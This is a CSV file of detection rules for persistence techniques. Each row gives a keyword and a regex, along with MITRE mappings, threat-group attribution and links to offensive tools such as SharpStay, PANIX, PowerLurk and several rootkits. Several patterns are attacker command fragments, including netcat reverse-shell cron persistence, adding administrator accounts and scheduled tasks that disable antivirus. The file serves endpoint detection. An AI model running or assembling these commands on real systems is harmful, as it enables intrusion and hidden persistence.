Persistence_category_detection.csv

"keyword","metadata_keyword_regex","metadata_keyword_type","metadata_tool","metadata_description","metadata_tool_techniques","metadata_tool_tactics","metadata_malwares_name","metadata_groups_name","metadata_category","metadata_link","metadata_enable_endpoint_detection","metadata_enable_proxy_detection","metadata_tags","metadata_comment","metadata_severity_score","metadata_popularity_score","metadata_github_stars","metadata_github_forks","metadata_github_updated_at","metadata_github_created_at"
"* /bin/nc * -e /bin/bash* > cron && crontab cron*",".{0,1000}\s\/bin\/nc\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}\s\>\scron\s\&\&\scrontab\scron.{0,1000}","greyware_tool_keyword","nc","Linux Persistence Shell cron","T1053 - T1037","TA0003","N/A","Calypso - GALLIUM","Persistence","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","#linux","N/A","10","10","1476","189","2025-01-23T14:44:33Z","2021-08-16T17:34:25Z"
"* /c echo mar3pora *",".{0,1000}\s\/c\secho\smar3pora\s.{0,1000}","greyware_tool_keyword","anydesk","command line used with anydesk in the notes of the ransomware group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* /c echo Pa$$w0rd | C:\ProgramData\anydesk.exe*",".{0,1000}\s\/c\secho\sPa\$\$w0rd\s\|\sC\:\\ProgramData\\anydesk\.exe.{0,1000}","greyware_tool_keyword","anydesk","command line used with anydesk in the notes of the ransomware group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* /Create /RU SYSTEM /TN MicrosoftEdgeUpdateTaskMachine /TR *",".{0,1000}\s\/Create\s\/RU\sSYSTEM\s\/TN\sMicrosoftEdgeUpdateTaskMachine\s\/TR\s.{0,1000}","greyware_tool_keyword","schtasks","SSH backdoor creation with schtasks","T1053 - T1059.004 - T1090","TA0003 - TA0005 - TA0011","N/A","Dispossessor","Persistence","https://www.trellix.com/blogs/research/cactus-ransomware-new-strain-in-the-market/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* /Create /SC ONCE /TN 'DisableBitdefender-*",".{0,1000}\s\/Create\s\/SC\sONCE\s\/TN\s\'DisableBitdefender\-.{0,1000}","offensive_tool_keyword","Dispossessor","scheduled task used by Dispossessor ransomware group to disabled AV","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#scheduledtask","N/A","10","10","N/A","N/A","N/A","N/A"
"* /create /tn ""SysChecks"" /tr c:\temp\sch.bat *",".{0,1000}\s\/create\s\/tn\s\""SysChecks\""\s\/tr\sc\:\\temp\\sch\.bat\s.{0,1000}","greyware_tool_keyword","schtasks","SSH backdoor creation with schtasks","T1053 - T1059.004 - T1090","TA0003 - TA0005 - TA0011","N/A","Dispossessor","Persistence","https://www.trellix.com/blogs/research/cactus-ransomware-new-strain-in-the-market/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* /Create /TN sch.bat /TR ""c:\temp\script.vbs"" *",".{0,1000}\s\/Create\s\/TN\ssch\.bat\s\/TR\s\""c\:\\temp\\script\.vbs\""\s.{0,1000}","greyware_tool_keyword","schtasks","SSH backdoor creation with schtasks","T1053 - T1059.004 - T1090","TA0003 - TA0005 - TA0011","N/A","Dispossessor","Persistence","https://www.trellix.com/blogs/research/cactus-ransomware-new-strain-in-the-market/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* /taskname:Cleanup *",".{0,1000}\s\/taskname\:Cleanup\s.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","N/A","9","4","327","45","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z"
"* action=BackdoorLNK *",".{0,1000}\saction\=BackdoorLNK\s.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"* action=CreateService servicename=* command=*",".{0,1000}\saction\=CreateService\sservicename\=.{0,1000}\scommand\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"* action=ElevatedRegistryKey keyname=Debug keypath*",".{0,1000}\saction\=ElevatedRegistryKey\skeyname\=Debug\skeypath.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"* action=ElevatedUserInitKey command=*",".{0,1000}\saction\=ElevatedUserInitKey\scommand\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"* action=JunctionFolder dllpath=*.dll guid=*",".{0,1000}\saction\=JunctionFolder\sdllpath\=.{0,1000}\.dll\sguid\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"* action=NewLNK filepath=*"" lnkname=*",".{0,1000}\saction\=NewLNK\sfilepath\=.{0,1000}\""\slnkname\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"* action=ScheduledTask taskname=* command=*runasuser*",".{0,1000}\saction\=ScheduledTask\staskname\=.{0,1000}\scommand\=.{0,1000}runasuser.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"* action=ScheduledTaskAction taskname=* command=*",".{0,1000}\saction\=ScheduledTaskAction\staskname\=.{0,1000}\scommand\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"* action=SchTaskCOMHijack clsid=*",".{0,1000}\saction\=SchTaskCOMHijack\sclsid\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"* action=UserRegistryKey keyname=Debug keypath=HKCU:*",".{0,1000}\saction\=UserRegistryKey\skeyname\=Debug\skeypath\=HKCU\:.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","#registry","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"* action=WMIEventSub command=* eventname=*",".{0,1000}\saction\=WMIEventSub\scommand\=.{0,1000}\seventname\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"* ADCS.ps1*",".{0,1000}\sADCS\.ps1.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","0","N/A","N/A","7","2","179","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z"
"* add nc without being detected by antivirus*",".{0,1000}\sadd\snc\swithout\sbeing\sdetected\sby\santivirus.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"* Add-KeeThiefLurker.ps1*",".{0,1000}\sAdd\-KeeThiefLurker\.ps1.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","376","68","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z"
"* --Args AntiVirus --XorKey*",".{0,1000}\s\-\-Args\sAntiVirus\s\-\-XorKey.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"* --args whoami*",".{0,1000}\s\-\-args\swhoami.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"* --backdoor-user *",".{0,1000}\s\-\-backdoor\-user\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"* BruteForce(*",".{0,1000}\sBruteForce\(.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"* chromepasswords.py*",".{0,1000}\schromepasswords\.py.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*- Cronos rootkit debugger -*",".{0,1000}\-\sCronos\srootkit\sdebugger\s\-.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","N/A","9","873","184","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z"
"* diamorphine.c*",".{0,1000}\sdiamorphine\.c.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1911","439","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"* diamorphine.h*",".{0,1000}\sdiamorphine\.h.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1911","439","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"* dynasty.sh*",".{0,1000}\sdynasty\.sh.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"* -EventName KeeThief -WMI*",".{0,1000}\s\-EventName\sKeeThief\s\-WMI.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","376","68","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z"
"* -EventName WmiBackdoor -PermanentCommand *",".{0,1000}\s\-EventName\sWmiBackdoor\s\-PermanentCommand\s.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","376","68","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z"
"* hacked_getdents*",".{0,1000}\shacked_getdents.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1911","439","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"* hostPath=""c:\"" writable=""true"" autoMount=""true""*",".{0,1000}\shostPath\=\""c\:\\\""\swritable\=\""true\""\sautoMount\=\""true\"".{0,1000}","greyware_tool_keyword","VirtualBox","adding the entire C drive as a shared folder for a VM","T1021.001 - T1137 - T1072","TA0006 - TA0008 - TA0005","N/A","RagnarLocker ","Persistence","https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* ImplantSSP.exe*",".{0,1000}\sImplantSSP\.exe.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","N/A","10","10","1399","244","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
"* --insecure brute --userpass *",".{0,1000}\s\-\-insecure\sbrute\s\-\-userpass\s.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"* --insecure brute --users *",".{0,1000}\s\-\-insecure\sbrute\s\-\-users\s.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"* JumpSession.x64.o*",".{0,1000}\sJumpSession\.x64\.o.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","0","N/A","N/A","9","1","78","13","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z"
"* JumpSession.x86.o*",".{0,1000}\sJumpSession\.x86\.o.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","0","N/A","N/A","9","1","78","13","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z"
"* keepass backdoor persistence*",".{0,1000}\skeepass\sbackdoor\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"* Keepass persistence backdoor *",".{0,1000}\sKeepass\spersistence\sbackdoor\s.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"* localgroup administrators BitdefenderBounty *",".{0,1000}\slocalgroup\sadministrators\sBitdefenderBounty\s.{0,1000}","offensive_tool_keyword","Dispossessor","user name used in Dispossessor ransomware group notes - adding to admin group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* localgroup Administrators localadm /ADD *",".{0,1000}\slocalgroup\sAdministrators\slocaladm\s\/ADD\s.{0,1000}","greyware_tool_keyword","net","command used in the Dispossessor ransomware group notes","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* --malicious-package *",".{0,1000}\s\-\-malicious\-package\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"* ncat * -e /bin/bash*|crontab*",".{0,1000}\sncat\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}\|crontab.{0,1000}","greyware_tool_keyword","ncat","reverse shell persistence","T1059.004 - T1053.005 - T1059.005","TA0002  - TA0005","N/A","Calypso - GALLIUM","Persistence","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"* OfficePersistence.ps1*",".{0,1000}\sOfficePersistence\.ps1.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z"
"* panix.sh --*",".{0,1000}\spanix\.sh\s\-\-.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"* panix.sh --generator*",".{0,1000}\spanix\.sh\s\-\-generator.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"* panix.sh --generator*",".{0,1000}\spanix\.sh\s\-\-generator.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"* panix.sh --systemd*",".{0,1000}\spanix\.sh\s\-\-systemd.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"* Persist General *.dll*",".{0,1000}\sPersist\sGeneral\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","N/A","10","3","262","47","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z"
"* Persist Tasksch *.dll*",".{0,1000}\sPersist\sTasksch\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","N/A","10","3","262","47","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z"
"* Persist TreatAs *.dll*",".{0,1000}\sPersist\sTreatAs\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","N/A","10","3","262","47","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z"
"* PowerLurk.ps1*",".{0,1000}\sPowerLurk\.ps1.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","376","68","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z"
"* r77-x64.dll*",".{0,1000}\sr77\-x64\.dll.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","N/A","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"* r77-x86.dll*",".{0,1000}\sr77\-x86\.dll.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","N/A","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"* rce.php /var*",".{0,1000}\srce\.php\s\/var.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"* rid_hijack.py*",".{0,1000}\srid_hijack\.py.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","N/A","9","2","169","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z"
"* ropbuffers.go*",".{0,1000}\sropbuffers\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"* ruler.exe*",".{0,1000}\sruler\.exe.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"* sandman_server.py*",".{0,1000}\ssandman_server\.py.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","N/A","N/A","10","8","781","107","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z"
"* sharedfolder add * -hostpath c:\ -automount*",".{0,1000}\ssharedfolder\sadd\s.{0,1000}\s\-hostpath\sc\:\\\s\-automount.{0,1000}","greyware_tool_keyword","VirtualBox","adding the entire C drive as a shared folder for a VM","T1021.001 - T1137 - T1072","TA0006 - TA0008 - TA0005","N/A","RagnarLocker ","Persistence","https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* SharpPersistSD.dll*",".{0,1000}\sSharpPersistSD\.dll.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","85","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z"
